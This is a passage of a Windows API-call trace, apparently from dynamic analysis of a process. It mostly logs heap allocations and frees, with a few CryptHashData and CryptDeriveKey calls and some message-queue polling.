[0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0126.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0126.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca7c0 [0126.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.165] CryptHashData (hHash=0x41ac640, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0126.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0126.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0126.166] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0126.167] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0126.167] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0126.167] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0126.167] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0126.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0126.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0126.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca808, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0126.168] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0126.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0126.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.170] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0126.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0126.171] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.171] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0126.171] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0126.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | 